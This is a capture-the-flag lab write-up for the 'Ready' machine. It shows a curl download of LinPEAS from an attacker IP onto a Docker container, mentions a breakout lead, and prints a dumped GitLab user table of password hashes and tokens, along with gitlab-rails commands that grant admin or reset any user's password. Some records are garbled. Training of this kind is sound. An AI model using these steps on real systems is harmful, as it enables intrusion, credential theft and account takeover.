InfoSec LAB

Ready_Automated

Created: 5 min read

PEAS

Since manual enumeration is pretty much limited inside a Docker container, I will get PEAS running

git@gitlab:/dev/shm$ curl -s http://10.10.14.8/linpeas.sh -O /dev/shm/linpeas.sh ; chmod 755 linpeas.sh

Delivery complete

Executing PEAS

Protections

PEAS was able to find out that it is a Docker container

Docker

Here are some basic enumeration regarding the container

The Docker container appears to be well-configured

Breakout

Except for one. PEAS has flagged one of the release_agent breakout techniques as possible

GitLab

╔══════════╣ Searching GitLab related files
gitlab-rails was found. Trying to dump users...
{"id"=>3,
 "email"=>"mitroglou@ready.com",
 "encrypted_password"=>
  "$2a$10$4vZAglOnEdNEe1SoNj1IE.RfotOt9gPnOXBEihjd7QBhsUmgmAdLi",
 "reset_password_token"=>nil,
 "reset_password_sent_at"=>nil,
 "remember_created_at"=>nil,
 "sign_in_count"=>1,
 "current_sign_in_at"=>wed, 08 jul 2020 09:10:23 UTC +00:00,
 "last_sign_in_at"=>wed, 08 jul 2020 09:10:23 UTC +00:00,
 "current_sign_in_ip"=>"172.19.0.1",
 "last_sign_in_ip"=>"172.19.0.1",
 "created_at"=>wed, 08 jul 2020 09:10:23 UTC +00:00,
 "updated_at"=>wed, 08 jul 2020 09:10:23 UTC +00:00,
 "name"=>"mitroglou",
 "admin"=>false,
 "projects_limit"=>100000,
 "skype"=>"",
 "linkedin"=>"",
 "twitter"=>"",
 "bio"=>nil,
 "failed_attempts"=>0,
 "locked_at"=>nil,
 "username"=>"mitroglou",
 "can_create_group"=>true,
 "can_create_team"=>false,
 "state"=>"active",
 "color_scheme_id"=>1,
 "password_expires_at"=>nil,
 "created_by_id"=>nil,
 "last_credential_check_at"=>nil,
 "avatar"=>nil,
 "confirmation_token"=>nil,
 "confirmed_at"=>wed, 08 jul 2020 09:10:23 UTC +00:00,
 "confirmation_sent_at"=>nil,
 "unconfirmed_email"=>nil,
 "hide_no_ssh_key"=>false,
 "website_url"=>"",
 "notification_email"=>"mitroglou@ready.com",
 "hide_no_password"=>false,
 "password_automatically_set"=>false,
 "location"=>nil,
 "encrypted_otp_secret"=>nil,
 "encrypted_otp_secret_iv"=>nil,
 "encrypted_otp_secret_salt"=>nil,
 "otp_required_for_login"=>false,
 "otp_backup_codes"=>nil,
 "public_email"=>"",
 "dashboard"=>0,
 "project_view"=>2,
 "consumed_timestep"=>nil,
 "layout"=>0,
 "hide_project_limit"=>false,
 "unlock_token"=>nil,
 "otp_grace_period_started_at"=>nil,
 "external"=>false,
 "incoming_email_token"=>"5qndapiw0f0d4jeebwmemiwvx",
 "organization"=>nil,
 "require_two_factor_authentication_from_group"=>false,
 "two_factor_grace_period"=>48,
 "ghost"=>nil,
ctivity_on"=>nil,
 "notified_of_own_activity"=>false,
 "preferred_language"=>"en",
 "theme_id"=>1,
 "accepted_term_id"=>nil,
 "feed_token"=>"9SYsUnsrUxskjbfdxvT2",
 "private_profile"=>nil,
 "include_private_contributions"=>nil,
 "commit_email"=>nil}
{"id"=>2,
 "email"=>"dude@ready.com",
 "encrypted_password"=>
  "$2a$10$NOMTXhO31vqykicMa6zj3O.F5PIyI9q/S4c.v22eMSfXNDdtpI2Mm",
 "reset_password_token"=>nil,
 "reset_password_sent_at"=>nil,
 "remember_created_at"=>nil,
 "sign_in_count"=>2,
 "current_sign_in_at"=>thu, 09 jul 2020 15:08:35 UTC +00:00,
 "last_sign_in_at"=>wed, 08 jul 2020 08:54:58 UTC +00:00,
 "current_sign_in_ip"=>"172.19.0.1",
 "last_sign_in_ip"=>"172.19.0.1",
 "created_at"=>wed, 08 jul 2020 08:54:57 UTC +00:00,
 "updated_at"=>thu, 09 jul 2020 15:08:35 UTC +00:00,
 "name"=>"dude",
 "admin"=>false,
 "projects_limit"=>100000,
 "skype"=>"",
 "linkedin"=>"",
 "twitter"=>"",
 "bio"=>nil,
 "failed_attempts"=>0,
 "locked_at"=>nil,
 "username"=>"dude",
 "can_create_group"=>true,
 "can_create_team"=>false,
 "state"=>"active",
 "color_scheme_id"=>1,
 "password_expires_at"=>nil,
 "created_by_id"=>nil,
 "last_credential_check_at"=>nil,
 "avatar"=>nil,
 "confirmation_token"=>nil,
 "confirmed_at"=>wed, 08 jul 2020 08:54:57 UTC +00:00,
 "confirmation_sent_at"=>nil,
 "unconfirmed_email"=>nil,
 "hide_no_ssh_key"=>false,
 "website_url"=>"",
 "notification_email"=>"dude@ready.com",
 "hide_no_password"=>false,
 "password_automatically_set"=>false,
 "location"=>nil,
 "encrypted_otp_secret"=>nil,
 "encrypted_otp_secret_iv"=>nil,
 "encrypted_otp_secret_salt"=>nil,
 "otp_required_for_login"=>false,
 "otp_backup_codes"=>nil,
 "public_email"=>"",
 "dashboard"=>0,
 "project_view"=>2,
 "consumed_timestep"=>nil,
 "layout"=>0,
 "hide_project_limit"=>false,
 "unlock_token"=>nil,
e_period_started_at"=>nil,
 "external"=>false,
 "incoming_email_token"=>"1deat2ahoquhwq9qt5hu5ys3",
 "organization"=>nil,
 "require_two_factor_authentication_from_group"=>false,
 "two_factor_grace_period"=>48,
 "ghost"=>nil,
 "last_activity_on"=>Thu, 09 Jul 2020,
 "notified_of_own_activity"=>false,
 "preferred_language"=>"en",
 "theme_id"=>1,
 "accepted_term_id"=>nil,
 "feed_token"=>"iLHFeaXaW7oT9Ef7NUPS",
 "private_profile"=>nil,
 "include_private_contributions"=>nil,
 "commit_email"=>nil}
{"id"=>4,
 "email"=>"test@test.gr",
 "encrypted_password"=>
  "$2a$10$7xK1UPcwvjWIo4ioCz28GeFSt.NR00AHsY2AF.gWzaWwikRVXCTXa",
 "reset_password_token"=>nil,
 "reset_password_sent_at"=>nil,
 "remember_created_at"=>nil,
 "sign_in_count"=>1,
 "current_sign_in_at"=>tue, 01 dec 2020 12:26:46 UTC +00:00,
 "last_sign_in_at"=>tue, 01 dec 2020 12:26:46 UTC +00:00,
 "current_sign_in_ip"=>"10.10.14.5",
 "last_sign_in_ip"=>"10.10.14.5",
 "created_at"=>tue, 01 dec 2020 12:26:44 UTC +00:00,
 "updated_at"=>sat, 25 mar 2023 20:59:25 UTC +00:00,
 "name"=>"test",
 "admin"=>false,
 "projects_limit"=>100000,
 "skype"=>"",
 "linkedin"=>"",
 "twitter"=>"",
 "bio"=>nil,
 "failed_attempts"=>10,
 "locked_at"=>sat, 25 mar 2023 20:59:25 UTC +00:00,
 "username"=>"test",
 "can_create_group"=>true,
 "can_create_team"=>false,
 "state"=>"active",
 "color_scheme_id"=>1,
 "password_expires_at"=>nil,
 "created_by_id"=>nil,
 "last_credential_check_at"=>nil,
 "avatar"=>nil,
 "confirmation_token"=>nil,
 "confirmed_at"=>tue, 01 dec 2020 12:26:43 UTC +00:00,
 "confirmation_sent_at"=>nil,
 "unconfirmed_email"=>nil,
 "hide_no_ssh_key"=>false,
 "website_url"=>"",
 "notification_email"=>"test@test.gr",
 "hide_no_password"=>false,
 "password_automatically_set"=>false,
 "location"=>nil,
 "encrypted_otp_secret"=>nil,
t_iv"=>nil,_otp_secre
 "encrypted_otp_secret_salt"=>nil,
 "otp_required_for_login"=>false,
 "otp_backup_codes"=>nil,
 "public_email"=>"",
 "dashboard"=>0,
 "project_view"=>2,
 "consumed_timestep"=>nil,
 "layout"=>0,
 "hide_project_limit"=>false,
 "unlock_token"=>
  "7be5be56d85ddf8ad0ba39217885b9769947c257fb33fdc89272133cc608a591",
 "otp_grace_period_started_at"=>nil,
 "external"=>false,
 "incoming_email_token"=>"2i44vq3s8gjw3onnr1z1rpfh9",
 "organization"=>nil,
 "require_two_factor_authentication_from_group"=>false,
 "two_factor_grace_period"=>48,
 "ghost"=>nil,
 "last_activity_on"=>nil,
 "notified_of_own_activity"=>false,
 "preferred_language"=>"en",
 "theme_id"=>1,
 "accepted_term_id"=>nil,
 "feed_token"=>"EqyEf_Buycz_dXqx1Lr5",
 "private_profile"=>nil,
 "include_private_contributions"=>nil,
 "commit_email"=>nil}
{"id"=>5,
 "email"=>"eb8a31bc5f2e4f8284c5a18b115cef77@mail.htb",
 "encrypted_password"=>
  "$2a$10$.aOidQ2aprnoXvfDNyNfGOuMLqcLkPljHsPeV8j7BZA4GU.5p1ZXm",
 "reset_password_token"=>nil,
 "reset_password_sent_at"=>nil,
 "remember_created_at"=>nil,
 "sign_in_count"=>1,
 "current_sign_in_at"=>mon, 07 dec 2020 16:49:39 UTC +00:00,
 "last_sign_in_at"=>mon, 07 dec 2020 16:49:39 UTC +00:00,
 "current_sign_in_ip"=>"10.10.14.5",
 "last_sign_in_ip"=>"10.10.14.5",
 "created_at"=>mon, 07 dec 2020 16:49:39 UTC +00:00,
 "updated_at"=>mon, 07 dec 2020 16:49:40 UTC +00:00,
 "name"=>"whatever",
 "admin"=>false,
 "projects_limit"=>100000,
 "skype"=>"",
 "linkedin"=>"",
 "twitter"=>"",
 "bio"=>nil,
 "failed_attempts"=>0,
 "locked_at"=>nil,
 "username"=>"eb8a31bc5f2e4f8284c5a18b115cef77",
 "can_create_group"=>true,
 "can_create_team"=>false,
 "state"=>"active",
 "color_scheme_id"=>1,
 "password_expires_at"=>nil,
 "created_by_id"=>nil,
 "last_credential_check_at"=>nil,
 "avatar"=>nil,
 "confirmation_token"=>nil,
t"=>mon, 07 dec 2020 16:49:39 UTC +00:00,
 "confirmation_sent_at"=>nil,
 "unconfirmed_email"=>nil,
 "hide_no_ssh_key"=>false,
 "website_url"=>"",
 "notification_email"=>"eb8a31bc5f2e4f8284c5a18b115cef77@mail.htb",
 "hide_no_password"=>false,
 "password_automatically_set"=>false,
 "location"=>nil,
 "encrypted_otp_secret"=>nil,
 "encrypted_otp_secret_iv"=>nil,
 "encrypted_otp_secret_salt"=>nil,
 "otp_required_for_login"=>false,
 "otp_backup_codes"=>nil,
 "public_email"=>"",
 "dashboard"=>0,
 "project_view"=>2,
 "consumed_timestep"=>nil,
 "layout"=>0,
 "hide_project_limit"=>false,
 "unlock_token"=>nil,
 "otp_grace_period_started_at"=>nil,
 "external"=>false,
 "incoming_email_token"=>"14hz3b0vannodneugjfdubkjs",
 "organization"=>nil,
 "require_two_factor_authentication_from_group"=>false,
 "two_factor_grace_period"=>48,
 "ghost"=>nil,
 "last_activity_on"=>nil,
 "notified_of_own_activity"=>false,
 
 "theme_id"=>1,
 "accepted_term_id"=>nil,
 "feed_token"=>"Hye-xUsUXke-x2c6Vm76",
 "private_profile"=>nil,
 "include_private_contributions"=>nil,
 "commit_email"=>nil}
{"id"=>1,
 "email"=>"admin@example.com",
 "encrypted_password"=>
  "$2a$10$.Kc4bwq3BqLCEzAGJVIJFeK4emNnucvAqk1vCv4Yp45yy2nmrFa.2",
 "reset_password_token"=>nil,
 "reset_password_sent_at"=>nil,
 "remember_created_at"=>nil,
 "sign_in_count"=>0,
 "current_sign_in_at"=>nil,
 "last_sign_in_at"=>nil,
 "current_sign_in_ip"=>nil,
 "last_sign_in_ip"=>nil,
 "created_at"=>wed, 08 jul 2020 08:53:02 UTC +00:00,
 "updated_at"=>sat, 25 mar 2023 23:36:14 UTC +00:00,
 "name"=>"Administrator",
 "admin"=>true,
 "projects_limit"=>100000,
 "skype"=>"",
 "linkedin"=>"",
 "twitter"=>"",
 "bio"=>nil,
 "failed_attempts"=>6,
 "locked_at"=>nil,
 "username"=>"root",
 "can_create_group"=>true,
 "can_create_team"=>false,
 "state"=>"active",
 "color_scheme_id"=>1,
 "password_expires_at"=>nil,
 "created_by_id"=>nil,
 "last_credential_check_at"=>nil,
 "avatar"=>nil,
 "confirmation_token"=>nil,
 "confirmed_at"=>wed, 08 jul 2020 08:53:02 UTC +00:00,
 "confirmation_sent_at"=>nil,
 "unconfirmed_email"=>nil,
 "hide_no_ssh_key"=>false,
 "website_url"=>"",
 "notification_email"=>"admin@example.com",
 "hide_no_password"=>false,
 "password_automatically_set"=>false,
 "location"=>nil,
 "encrypted_otp_secret"=>nil,
 "encrypted_otp_secret_iv"=>nil,
 "encrypted_otp_secret_salt"=>nil,
 "otp_required_for_login"=>false,
 "otp_backup_codes"=>nil,
 "public_email"=>"",
 "dashboard"=>0,
 "project_view"=>2,
 "consumed_timestep"=>nil,
 "layout"=>0,
 "hide_project_limit"=>false,
 "unlock_token"=>nil,
 "otp_grace_period_started_at"=>nil,
 "external"=>false,
 "incoming_email_token"=>"25kxfqca2ooawuog93yw1u9d2",
 "organization"=>nil,
actor_authentication_from_group"=>false,
 "two_factor_grace_period"=>48,
 "ghost"=>nil,
 "last_activity_on"=>nil,
 "notified_of_own_activity"=>false,
 "preferred_language"=>"en",
 "theme_id"=>1,
 "accepted_term_id"=>nil,
 "feed_token"=>nil,
 "private_profile"=>nil,
 "include_private_contributions"=>nil,
 "commit_email"=>nil}
{"id"=>6,
 "email"=>"tester@tester.tester",
 "encrypted_password"=>
  "$2a$10$Iv7I0t.8pKbOW9Uk5.NW5uo/o.S3Nc8qypm6D6BV7YagR3UH5q09.",
 "reset_password_token"=>nil,
 "reset_password_sent_at"=>nil,
 "remember_created_at"=>nil,
 "sign_in_count"=>2,
"=>sat, 25 mar 2023 21:03:17 UTC +00:00,
 "last_sign_in_at"=>sat, 25 mar 2023 20:57:23 UTC +00:00,
 "current_sign_in_ip"=>"10.10.14.8",
 "last_sign_in_ip"=>"10.10.14.8",
 "created_at"=>sat, 25 mar 2023 20:57:23 UTC +00:00,
 "updated_at"=>sat, 25 mar 2023 21:03:23 UTC +00:00,
 "name"=>"tester",
 "admin"=>false,
 "projects_limit"=>100000,
 "skype"=>"",
 "linkedin"=>"",
 "twitter"=>"",
 "bio"=>nil,
 "failed_attempts"=>0,
 "locked_at"=>nil,
 "username"=>"tester",
 "can_create_group"=>true,
 "can_create_team"=>false,
 "state"=>"active",
 "color_scheme_id"=>1,
 "password_expires_at"=>nil,
 "created_by_id"=>nil,
 "last_credential_check_at"=>nil,
 "avatar"=>nil,
 "confirmation_token"=>nil,
 "confirmed_at"=>sat, 25 mar 2023 20:57:23 UTC +00:00,
 "confirmation_sent_at"=>nil,
 "unconfirmed_email"=>nil,
 "hide_no_ssh_key"=>false,
 "website_url"=>"",
 "notification_email"=>"tester@tester.tester",
 "hide_no_password"=>false,
 "password_automatically_set"=>false,
 "location"=>nil,
 "encrypted_otp_secret"=>nil,
 "encrypted_otp_secret_iv"=>nil,
 "encrypted_otp_secret_salt"=>nil,
 "otp_required_for_login"=>false,
 "otp_backup_codes"=>nil,
 "public_email"=>"",
 "dashboard"=>0,
 "project_view"=>2,
 "consumed_timestep"=>nil,
 "layout"=>0,
 "hide_project_limit"=>false,
 "unlock_token"=>nil,
 "otp_grace_period_started_at"=>nil,
 "external"=>false,
 "incoming_email_token"=>"cqag23pp7oxx340c2qjk883d",
 "organization"=>nil,
 "require_two_factor_authentication_from_group"=>false,
 "two_factor_grace_period"=>48,
 "ghost"=>nil,
 "last_activity_on"=>Sat, 25 Mar 2023,
 "notified_of_own_activity"=>false,
 "preferred_language"=>"en",
 "theme_id"=>1,
 "accepted_term_id"=>nil,
 "feed_token"=>"twgc1eN-dte1R41mQG4d",
 "private_profile"=>nil,
 "include_private_contributions"=>nil,
 "commit_email"=>nil}
{"id"=>8,
@example.com",st
 "encrypted_password"=>"",
 "reset_password_token"=>nil,
 "reset_password_sent_at"=>nil,
 "remember_created_at"=>nil,
 "sign_in_count"=>0,
 "current_sign_in_at"=>nil,
 "last_sign_in_at"=>nil,
 "current_sign_in_ip"=>nil,
 "last_sign_in_ip"=>nil,
 "created_at"=>sat, 25 mar 2023 22:59:49 UTC +00:00,
 "updated_at"=>sat, 25 mar 2023 22:59:49 UTC +00:00,
 "name"=>"Ghost User",
 "admin"=>false,
 "projects_limit"=>100000,
 "skype"=>"",
 "linkedin"=>"",
 "twitter"=>"",
 "bio"=>
  "This is a \"Ghost User\", created to hold all issues authored by users that have since been deleted. This user cannot be removed.",
 "failed_attempts"=>0,
 "locked_at"=>nil,
 "username"=>"ghost",
 "can_create_group"=>true,
 "can_create_team"=>false,
 "state"=>"active",
 "color_scheme_id"=>1,
 "password_expires_at"=>nil,
 "created_by_id"=>nil,
 "last_credential_check_at"=>nil,
 "avatar"=>nil,
 "confirmation_token"=>"aLhEzu9TWzSTjSxCJbUi",
 "confirmed_at"=>nil,
 "confirmation_sent_at"=>sat, 25 mar 2023 22:59:49 UTC +00:00,
 "unconfirmed_email"=>nil,
 "hide_no_ssh_key"=>false,
 "website_url"=>"",
 "notification_email"=>nil,
 "hide_no_password"=>false,
 "password_automatically_set"=>false,
 "location"=>nil,
 "encrypted_otp_secret"=>nil,
 "encrypted_otp_secret_iv"=>nil,
 "encrypted_otp_secret_salt"=>nil,
 "otp_required_for_login"=>false,
 "otp_backup_codes"=>nil,
 "public_email"=>"",
 "dashboard"=>0,
 "project_view"=>2,
 "consumed_timestep"=>nil,
 "layout"=>0,
 "hide_project_limit"=>false,
 "unlock_token"=>nil,
 "otp_grace_period_started_at"=>nil,
 "external"=>false,
 "incoming_email_token"=>"ad1kyxaimnfx2wt0g7mjkjzhw",
 "organization"=>nil,
 "require_two_factor_authentication_from_group"=>false,
 "two_factor_grace_period"=>48,
 "ghost"=>true,
 "last_activity_on"=>nil,
 "notified_of_own_activity"=>false,
 "preferred_language"=>"en",
 "theme_id"=>1,
 "accepted_term_id"=>nil,
 "feed_token"=>nil,
 "private_profile"=>nil,
 "include_private_contributions"=>nil,
 "commit_email"=>nil}
if you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: "youruser@example.com"); user.admin = TRUE; user.save!'
alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: "admin@example.com"); user.password = "pass_peass_pass"; user.password_confirmation = "pass_peass_pass"; user.save!'

PEAS has extracted some credentials from GitLab related files

Interactive Graph View

Backlinks